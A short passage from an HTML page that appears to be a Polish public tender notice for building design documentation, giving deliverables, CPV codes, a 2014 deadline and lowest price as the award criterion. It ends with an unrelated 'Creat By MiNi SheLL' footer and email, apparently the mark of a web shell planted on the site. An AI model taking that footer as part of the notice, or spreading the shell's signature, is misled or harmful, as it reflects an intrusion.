b.  Projekt instalacji sygnalizacji pożaru 
c.  Projekt instalacji elektrycznej, w tym: niskoprądowej i teletechnicznej
d. Projekt  instalacji  wentylacji mechanicznej
e. Kosztorysy inwestorskie - 2 egz.
f.  Przedmiary robót - 2 egz.
g.  Informację bezpieczeństwa i ochrony zdrowia    
h. Specyfikację techniczną wykonania i odbioru robót.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.34.00-9, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com